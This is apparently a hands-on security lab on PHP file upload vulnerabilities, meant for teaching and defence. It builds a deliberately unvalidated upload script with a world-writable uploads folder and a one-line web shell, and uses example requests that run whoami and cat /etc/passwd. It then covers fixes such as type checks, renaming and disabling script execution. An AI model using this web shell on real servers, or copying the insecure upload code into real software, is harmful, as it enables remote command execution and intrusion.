Objective
Learn how to exploit File Upload Vulnerabilities by uploading malicious scripts (e.g., web shells) to a server and understand secure practices to prevent such attacks.
Scenario
You are assessing a company’s internal web portal that allows employees to upload profile pictures. Due to improper input validation, the upload feature is vulnerable, allowing attackers to upload malicious scripts. Your goal is to exploit this vulnerability by uploading a PHP web shell to achieve remote command execution.
Lab Setup
Prerequisites:
- Basic knowledge of PHP and file handling.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
PHP Script for File Upload
Create a file upload.php:
<?php
if (isset($_POST['submit'])) {
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
echo "<h2>The file " . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</h2>";
} else {
echo "<h2>Sorry, there was an error uploading your file.</h2>";
}
}
?>
<form action="" method="POST" enctype="multipart/form-data">
Select file to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<button type="submit" name="submit">Upload File</button>
</form>Creating the Upload Directory
In the project root, create a folder named uploads.
Set permissions to allow file uploads (for Linux/Mac):
chmod 777 uploadsRunning the Application
Start the Apache server.
Place upload.php in the web server’s root directory (htdocs for XAMPP).
Open http://localhost/upload.php in your browser.
Exploitation Steps
Step 1: Creating a PHP Web Shell
Create a file named shell.php with the following content:
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>Step 2: Uploading the Malicious Script
- Open
http://localhost/upload.php. - Upload the
shell.phpfile. - Navigate to
http://localhost/uploads/shell.php?cmd=whoami.
Expected Result:
- The server executes the
whoamicommand and displays the current user.
Step 3: Gaining Full Control
- Execute other commands:
http://localhost/uploads/shell.php?cmd=lshttp://localhost/uploads/shell.php?cmd=cat /etc/passwd
Solution and Prevention
Problem Analysis
- The server allows arbitrary file uploads without validating file types or contents.
Fixing the Vulnerability
Restrict Allowed File Types
Only allow specific file extensions:
$allowed_types = ['jpg', 'jpeg', 'png', 'gif'];
$file_ext = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
if (!in_array($file_ext, $allowed_types)) {
die("<h2>File type not allowed.</h2>");
}Validate File Content (MIME Type)
Use mime_content_type() to check the actual file content:
$mime_type = mime_content_type($_FILES['fileToUpload']['tmp_name']);
$allowed_mime = ['image/jpeg', 'image/png', 'image/gif'];
if (!in_array($mime_type, $allowed_mime)) {
die("<h2>Invalid file content.</h2>");
}Rename Uploaded Files
Rename files to prevent executing uploaded scripts: $new_name = uniqid() . '.' . $file_ext; $target_file = $target_dir . $new_name;
Store Files Outside the Web Root
Move uploads to a non-public directory and access files through a script.
Disable Script Execution in Uploads Folder
For Apache, create an .htaccess file in the uploads/ folder:
php_flag engine off
Options -ExecCGI
AddType text/plain .php .php5 .php7Testing After Fix
- Attempt to upload
shell.phpagain. - Observe that the upload is blocked or the file cannot be executed.
Conclusion
In this lab, you exploited a File Upload Vulnerability to upload a malicious PHP script and execute arbitrary commands. You also explored effective mitigation strategies, including file type validation, content checks, file renaming, and disabling script execution, to secure applications against file upload attacks.
0 Comments